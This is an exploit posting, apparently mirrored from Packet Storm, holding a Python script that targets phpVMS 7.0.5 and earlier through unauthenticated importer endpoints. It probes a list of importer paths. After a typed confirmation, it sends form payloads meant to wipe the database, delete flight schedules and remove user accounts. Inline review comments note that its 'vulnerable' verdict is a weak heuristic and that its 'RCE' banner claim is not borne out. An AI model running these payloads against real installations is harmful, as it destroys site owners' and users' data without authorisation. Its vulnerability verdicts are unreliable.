## https://sploitus.com/exploit?id=PACKETSTORM:223017
==================================================================================================================================
| # Title : phpVMS ≤ 7.0.5 Unauthenticated Import Endpoint Bypass |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://phpvms.net/ |
==================================================================================================================================
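[+] Summary : This script is an active vulnerability testing and exploitation tool targeting phpVMS ≤ 7.0.5.
It scans multiple importer-related endpoints, attempts POST-based actions that simulate or trigger destructive
operations (such as import, delete, and database wipe behaviors), and classifies a target as vulnerable based on HTTP responses and keyword indicators.
The verdict is a heuristic built from status codes, keyword matches and response length, so a "vulnerable" result needs manual confirmation; the script's own header lists phpVMS 7.0.6+ as the patched release.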
[+] POC :
#!/usr/bin/env python3
"""
Affected: phpVMS ≤ 7.0.5
Patched: phpVMS 7.0.6+
"""
import requests
import sys
import time
import argparse
from urllib.parse import urljoin
# Colour output is optional: it is used only when colorama can be imported.
try:
    from colorama import init, Fore, Style
    init(autoreset=True)
    COLORS = True
except ImportError:
    # Stand-in classes so attribute lookups on Fore/Style yield empty strings.
    # Only the four colour names listed on the next lines are defined here.
    COLORS = False
    class Fore:
        RED = GREEN = YELLOW = CYAN = ''
    class Style:
        RESET_ALL = ''
def colorize(text, color):
    """Wrap *text* in *color* plus a reset code when colour output is on.

    When COLORS is false the text is returned unchanged.
    """
    return f"{color}{text}{Style.RESET_ALL}" if COLORS else text
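def banner():
    """Print the tool's title box in red.

    The frame is generated from box-drawing characters so the output no
    longer depends on how the literal was decoded when the file was copied.
    """
    width = 62
    rows = (
        "CVE-2026-42569 - phpVMS RCE/Destructive",
        "Unauthenticated Legacy Importer Access",
        "By indoushka",
    )
    frame = ["╔" + "═" * width + "╗"]
    frame.extend("║" + row.center(width) + "║" for row in rows)
    frame.append("╚" + "═" * width + "╝")
    banner_text = "\n" + "\n".join(frame) + "\n"
    # NOTE(review): the banner says "RCE", while the page title describes an
    # unauthenticated import endpoint bypass and no request in this file
    # attempts code execution.
    print(colorize(banner_text, Fore.RED))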
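def test_endpoint(target, endpoint, timeout=10, verify_ssl=False):
    """Probe one importer path with a single unauthenticated GET.

    This function runs for every scan and has no confirmation prompt, so it
    sends only the read-only ``basic_access`` request.  Form posts that ask
    the importer to import, delete or clear data are left to
    attempt_exploit(), which sits behind the typed confirmation.

    Args:
        target: Base URL of the installation.
        endpoint: Path appended to the base URL.
        timeout: Per-request timeout in seconds.
        verify_ssl: Passed to requests as ``verify``.  The default of False
            skips certificate validation, so the response is not
            authenticated as coming from the intended host.

    Returns:
        ``(vulnerable, results)``.  ``results`` holds one dict for the probe
        when it matched, with ``payload``, ``status`` and ``indicators``
        (the names of the keyword checks that fired, at most three).
    """
    url = urljoin(target.rstrip('/') + '/', endpoint.lstrip('/'))
    print(colorize(f"[*] Testing: {url}", Fore.YELLOW))
    # Fixed, self-identifying User-Agent: unmodified runs of this script can
    # be found in web-server access logs by searching for this string.
    headers = {"User-Agent": "Mozilla/5.0 (CVE-2026-42569 Scanner)"}
    vulnerable = False
    results = []
    try:
        r = requests.get(url, headers=headers, timeout=timeout,
                         verify=verify_ssl, allow_redirects=True)
        body = r.text.lower()
        # Named checks, so the report shows which keyword fired instead of a
        # list of bare True values.
        checks = {
            "success": "success" in body,
            "imported": "imported" in body,
            "deleted": "deleted" in body,
            "truncat": "truncat" in body,
            "completed": "completed" in body,
            "database_clear_or_wipe": "database" in body and ("clear" in body or "wipe" in body),
        }
        matched = [name for name, hit in checks.items() if hit]
        if r.status_code in [200, 301, 302, 307, 308]:
            # NOTE(review): the length test fires on any ordinary page longer
            # than 200 characters, and redirects are followed, so a login or
            # error page can be counted as a hit.  An empty "indicators" list
            # in the result means the verdict rests on length alone and needs
            # manual confirmation.
            if matched or len(r.text) > 200:
                vulnerable = True
                results.append({
                    "payload": "basic_access",
                    "status": r.status_code,
                    "indicators": matched[:3],
                })
        elif r.status_code == 403:
            print(colorize(" [!] Endpoint exists but returned 403 (may still be vulnerable in older versions)", Fore.YELLOW))
    except requests.exceptions.ConnectionError:
        print(colorize(" [-] Connection error - target may be down", Fore.RED))
    except requests.exceptions.Timeout:
        print(colorize(f" [-] Timeout on {url}", Fore.RED))
    except Exception as e:
        print(colorize(f" [-] Error: {str(e)[:50]}", Fore.RED))
    return vulnerable, results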
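def attempt_exploit(target, endpoint, destructive=False, timeout=10):
    """Post the importer forms listed below, only after typed confirmation.

    Args:
        target: Base URL of the installation.
        endpoint: Importer path to post to.
        destructive: Must be true for anything to be sent.
        timeout: Per-request timeout in seconds.

    Returns:
        True if at least one post came back with status 200 or 302, else
        False.  That status only shows the server answered the request; it
        is not evidence that any record was changed.
    """
    # Guard first, so the default destructive=False can never fall through to
    # the requests below without passing the confirmation prompt.
    if not destructive:
        return False
    print(colorize("\n[!!!] DESTRUCTIVE MODE ENABLED - THIS WILL DAMAGE DATA [!!!]", Fore.RED))
    confirm = input(colorize("Type 'CONFIRM_DESTROY' to continue: ", Fore.RED))
    if confirm != "CONFIRM_DESTROY":
        print(colorize("[*] Destructive operation cancelled.", Fore.YELLOW))
        return False
    url = urljoin(target.rstrip('/') + '/', endpoint.lstrip('/'))
    # Each entry is one unauthenticated form post.  On a server you operate,
    # POSTs to importer paths that carry no authenticated session are the
    # access-log trace of this step.
    dangerous_payloads = [
        {
            "name": "FULL_DATABASE_WIPE",
            "data": {
                "action": "full_import",
                "wipe_first": "true",
                "confirm": "yes",
                "force": "1"
            },
            "description": "Attempts to wipe entire database"
        },
        {
            "name": "DELETE_ALL_FLIGHTS",
            "data": {
                "action": "import_schedules",
                "clear_existing": "on",
                "submit": "Import"
            },
            "description": "Deletes all flight schedules"
        },
        {
            "name": "TRUNCATE_USERS",
            "data": {
                "action": "import_users",
                "replace": "all",
                "_method": "DELETE"
            },
            "description": "Removes user accounts"
        }
    ]
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Requested-With": "XMLHttpRequest"
    }
    success_count = 0
    for payload in dangerous_payloads:
        print(colorize(f"\n[*] Attempting: {payload['name']}", Fore.MAGENTA))
        print(colorize(f" Description: {payload['description']}", Fore.CYAN))
        try:
            # Certificate validation is switched off for these posts.
            r = requests.post(url, headers=headers, data=payload["data"],
                              timeout=timeout, verify=False, allow_redirects=True)
            if r.status_code in [200, 302]:
                print(colorize(" [+] Payload delivered - Check target for damage", Fore.RED))
                success_count += 1
            else:
                print(colorize(f" [-] Failed with status: {r.status_code}", Fore.YELLOW))
        except Exception as e:
            print(colorize(f" [-] Error: {str(e)[:50]}", Fore.RED))
    return success_count > 0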
def scan_common_endpoints(target):
    """Run test_endpoint() over the built-in list of importer-style paths.

    Returns a list of ``{"endpoint", "results"}`` dicts, one per path that
    test_endpoint() flagged.  The same path list doubles as a set of request
    paths to search for in access logs.
    """
    candidate_paths = (
        "/importer",
        "/importer/index",
        "/importer/index.php",
        "/import",
        "/import/index",
        "/legacy/importer",
        "/admin/importer",
        "/install/importer",
        "/public/importer",
        "/index.php/importer",
        "/index.php/import",
        "/?module=importer",
        "/index.php?module=import",
        "/legacy/import",
        "/tools/importer",
        "/maintenance/import",
    )
    flagged = []
    for path in candidate_paths:
        is_hit, findings = test_endpoint(target, path)
        if not is_hit:
            print(colorize(f"[-] Not vulnerable: {path}", Fore.RED))
            continue
        flagged.append({"endpoint": path, "results": findings})
        print(colorize(f"\n[+] VULNERABLE: {path}", Fore.GREEN))
        for finding in findings:
            print(colorize(f" - Payload '{finding['payload']}' triggered (Status: {finding['status']})", Fore.GREEN))
    return flagged
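def check_version(target):
    """Fetch the landing page and try to read a phpVMS version from it.

    The version is taken from the first ``phpVMS ... N.N.N`` match in the
    response body.  That text is whatever the server chooses to return, so a
    missing or altered string says nothing about patch status; the installed
    release is best confirmed on the host itself.

    Returns:
        The matched version string, or None when no version was found or the
        request failed.
    """
    import re

    print(colorize("\n[*] Attempting version detection...", Fore.CYAN))
    try:
        # Certificate validation is switched off for this request.
        r = requests.get(target, timeout=10, verify=False)
        if "phpVMS" in r.text:
            version_match = re.search(r'phpVMS[^\d]*(\d+\.\d+\.\d+)', r.text, re.I)
            if version_match:
                version = version_match.group(1)
                print(colorize(f"[+] Detected phpVMS version: {version}", Fore.CYAN))
                # Compare release numbers as integers.  As plain strings,
                # "7.0.10" sorts before "7.0.5" and a patched release would
                # be reported as affected.
                if tuple(int(part) for part in version.split('.')) <= (7, 0, 5):
                    print(colorize(f"[!] Version {version} is VULNERABLE!", Fore.RED))
                else:
                    print(colorize(f"[*] Version {version} appears patched", Fore.GREEN))
                return version
        if 'X-Powered-By' in r.headers:
            if 'phpVMS' in r.headers['X-Powered-By']:
                print(colorize("[+] Header reveals phpVMS installation", Fore.CYAN))
    except Exception as e:
        print(colorize(f"[-] Version detection failed: {e}", Fore.YELLOW))
    return None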
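def exploit(target, destructive=False, scan_all=False):
    """Drive one run: version check, endpoint probing, report, optional posts.

    Args:
        target: Base URL of the installation.
        destructive: When true, every flagged endpoint is handed to
            attempt_exploit(), which prompts before sending anything.
        scan_all: When true, probe the full list in scan_common_endpoints()
            instead of the three default paths.
    """
    print(colorize(f"[*] Targeting: {target}", Fore.CYAN))
    version = check_version(target)
    # Compare release numbers as integers; as plain strings "7.0.10" sorts
    # before "7.0.5", so the patched-release notice would be skipped.
    if version and tuple(int(part) for part in version.split('.')) > (7, 0, 5):
        # The run continues after this notice; it is informational only.
        print(colorize("[!] Target appears patched. Proceeding with caution...", Fore.YELLOW))
    if scan_all:
        print(colorize("\n[*] Running full endpoint scan...", Fore.CYAN))
        vulnerable_endpoints = scan_common_endpoints(target)
    else:
        print(colorize("\n[*] Testing common endpoints...", Fore.CYAN))
        endpoints = ["/importer", "/import", "/legacy/importer"]
        vulnerable_endpoints = []
        for endpoint in endpoints:
            vulnerable, results = test_endpoint(target, endpoint)
            if vulnerable:
                vulnerable_endpoints.append({"endpoint": endpoint, "results": results})
    if vulnerable_endpoints:
        # The verdict printed here is only as strong as test_endpoint()'s
        # status/keyword/length heuristic.
        print(colorize("\n" + "="*60, Fore.RED))
        print(colorize("[!!!] SYSTEM IS VULNERABLE TO CVE-2026-42569 [!!!]", Fore.RED))
        print(colorize("="*60, Fore.RED))
        for vuln in vulnerable_endpoints:
            print(colorize(f"\n[+] Vulnerable endpoint: {vuln['endpoint']}", Fore.RED))
            for result in vuln['results']:
                print(colorize(f" - {result['payload']} payload succeeded", Fore.YELLOW))
        print(colorize("\n" + "="*60, Fore.RED))
        print(colorize("IMPACT: Unauthenticated database wipe/delete possible", Fore.RED))
        print(colorize("="*60, Fore.RED))
        if destructive and vulnerable_endpoints:
            print(colorize("\n[*] Preparing exploitation sequence...", Fore.MAGENTA))
            for vuln in vulnerable_endpoints:
                print(colorize(f"\n[*] Exploiting: {vuln['endpoint']}", Fore.MAGENTA))
                attempt_exploit(target, vuln['endpoint'], destructive=True)
    else:
        print(colorize("\n[*] No vulnerable endpoints detected", Fore.GREEN))
        print(colorize("[*] Target may be patched or configured securely", Fore.GREEN))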
def main():
    """Parse the command line and hand the target to exploit()."""
    banner()
    cli = argparse.ArgumentParser(
        description='CVE-2026-42569 - phpVMS Unauthenticated Import Endpoint Bypass',
        epilog='Example: python3 CVE-2026-42569.py http://target.com --destructive',
    )
    cli.add_argument('target', help='Target URL (e.g., http://target.com)')
    cli.add_argument(
        '--destructive', '-d',
        action='store_true',
        help='Enable destructive exploitation (WILL DAMAGE DATA)',
    )
    cli.add_argument(
        '--scan-all', '-s',
        action='store_true',
        help='Scan all common endpoint variations',
    )
    # NOTE(review): --timeout is parsed, but the call to exploit() below does
    # not pass it on, so the per-function default of 10 seconds applies.
    cli.add_argument(
        '--timeout', '-t',
        type=int,
        default=10,
        help='Request timeout in seconds (default: 10)',
    )
    opts = cli.parse_args()

    # A target given without a scheme is treated as plain HTTP.
    has_scheme = opts.target.startswith(('http://', 'https://'))
    if not has_scheme:
        opts.target = 'http://' + opts.target

    try:
        exploit(opts.target, opts.destructive, opts.scan_all)
    except KeyboardInterrupt:
        print(colorize("\n[*] Scan interrupted by user", Fore.YELLOW))
        sys.exit(0)

    rule = "=" * 60
    print(colorize("\n" + rule, Fore.RED))
    print(colorize("REMINDER: This vulnerability can cause COMPLETE DATABASE DELETION", Fore.RED))
    print(colorize("Use responsibly and only on authorized targets.", Fore.RED))
    print(colorize(rule, Fore.RED))
if __name__ == "__main__":
    # Called with no arguments: print the hand-written usage text and exit
    # with status 1 instead of letting argparse report the missing target.
    if len(sys.argv) == 1:
        usage_lines = (
            "Usage: python3 CVE-2026-42569.py <target> [options]",
            "\nBasic scan:",
            " python3 CVE-2026-42569.py http://phpvms.example.com",
            "\nFull scan:",
            " python3 CVE-2026-42569.py http://phpvms.example.com --scan-all",
            "\nDestructive mode (WILL DAMAGE DATA):",
            " python3 CVE-2026-42569.py http://phpvms.example.com --destructive",
            "\nOptions:",
            " --destructive, -d Enable destructive exploitation",
            " --scan-all, -s Scan all endpoint variations",
            " --timeout, -t Request timeout in seconds",
        )
        for usage_line in usage_lines:
            print(usage_line)
        sys.exit(1)
    main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================